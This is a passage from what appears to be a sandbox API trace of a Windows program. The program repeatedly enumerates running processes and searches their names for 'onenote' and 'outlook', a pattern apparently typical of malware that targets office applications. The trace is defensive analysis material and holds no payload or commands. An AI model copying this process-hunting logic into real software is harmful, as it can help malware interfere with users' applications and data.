lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.158] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0098.158] StrStrIA (lpFirst="conhost.exe", lpSrch="onenote") returned 0x0 [0098.158] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0098.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.160] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35781e0 [0098.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x35781e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0098.160] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0098.160] StrStrIA (lpFirst="rxodge.exe", lpSrch="onenote") returned 0x0 [0098.160] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0098.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.161] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578348 [0098.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3578348, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0098.161] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0098.161] StrStrIA (lpFirst="sppsvc.exe", lpSrch="onenote") returned 0x0 [0098.161] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0098.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.163] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357acf8 [0098.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357acf8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0098.163] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0098.163] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="onenote") returned 0x0 [0098.163] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0098.163] CloseHandle (hObject=0x350) returned 1 [0098.164] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0098.199] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.201] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357ad38 [0098.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357ad38, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0098.201] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0098.201] StrStrIA (lpFirst="[System Process]", lpSrch="outlook") returned 0x0 [0098.202] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0098.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0098.203] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574ef0 [0098.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574ef0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0098.203] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0098.203] StrStrIA (lpFirst="System", lpSrch="outlook") returned 0x0 [0098.203] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0098.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.204] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578180 [0098.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3578180, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0098.204] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0098.204] StrStrIA (lpFirst="smss.exe", lpSrch="outlook") returned 0x0 [0098.204] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0098.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.205] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578198 [0098.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3578198, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0098.206] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0098.206] StrStrIA (lpFirst="csrss.exe", lpSrch="outlook") returned 0x0 [0098.206] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0098.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.207] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35781b0 [0098.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x35781b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0098.207] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0098.207] StrStrIA (lpFirst="wininit.exe", lpSrch="outlook") returned 0x0 [0098.207] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0098.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.208] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578360 [0098.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3578360, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0098.209] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0098.209] StrStrIA (lpFirst="csrss.exe", lpSrch="outlook") returned 0x0 [0098.209] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0098.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.210] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578270 [0098.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3578270, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0098.210] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0098.210] StrStrIA (lpFirst="winlogon.exe", lpSrch="outlook") returned 0x0 [0098.210] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0098.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.211] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578288 [0098.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3578288, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0098.211] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0098.211] StrStrIA (lpFirst="services.exe", lpSrch="outlook") returned 0x0 [0098.211] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0098.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.213] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35780a8 [0098.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x35780a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0098.213] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0098.213] StrStrIA (lpFirst="lsass.exe", lpSrch="outlook") returned 0x0 [0098.213] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.214] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578138 [0098.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.214] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.214] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.214] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0098.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.216] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3578240 [0098.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3578240, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0098.216] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0098.216] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="outlook") returned 0x0 [0098.216] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0098.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.217] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35781c8 [0098.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35781c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0098.217] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0098.217] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="outlook") returned 0x0 [0098.217] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.218] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578108 [0098.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578108, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.218] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.218] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.218] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0098.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0098.220] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3575020 [0098.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3575020, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0098.220] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0098.220] StrStrIA (lpFirst="dwm.exe", lpSrch="outlook") returned 0x0 [0098.220] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.221] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35781f8 [0098.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35781f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.222] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.222] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.222] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.223] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578210 [0098.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578210, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.223] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.224] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.224] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.225] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35782a0 [0098.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35782a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.225] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.225] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.225] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.226] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35782b8 [0098.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35782b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.226] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.226] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.226] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.228] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35782e8 [0098.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35782e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.228] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.228] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.228] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.229] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578300 [0098.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, 